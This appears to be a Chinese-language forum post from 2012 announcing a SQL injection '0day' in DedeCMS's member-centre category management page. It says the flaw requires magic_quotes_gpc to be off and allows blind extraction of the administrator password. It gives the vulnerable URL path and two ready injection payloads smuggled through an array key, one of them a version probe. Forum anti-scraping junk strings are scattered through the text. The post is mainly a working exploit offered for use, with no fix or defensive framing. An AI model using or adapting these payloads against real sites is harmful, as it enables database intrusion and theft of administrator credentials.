标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码 [打印本页] 作者: admin 时间: 2012-12-20 08:08 标题: DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码 需要magic_quotes_gpc = Off,所以说是鸡肋啊. : U% T3 _" T! a1 Q6 a% f. e' r0 m 1 k/ V5 b' i/ X, [$ B6 Q " U$ }4 F, `: D; m l; c发生在数组key里的注射漏洞,有点意思.$ X! T2 k$ o, i" V" ^5 H7 P
: t7 X/ v0 C( g- C: R" n
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下3 {! t8 E2 Z- j" X1 X* ] z) T
' E* b' {) O2 P' E3 E http://www.xxx.com /dede/member/mtypes.php?dopost=save `7 C# V! V5 s# Z, H3 P$ H 7 J# h% B! N' h
exploit:3 Z& `: f5 U, t5 x3 f: R. o+ W& U
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r$ G0 s' p k1 t7 p% o; z, S D
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r) ^. d! g- x3 h( l+ R* ]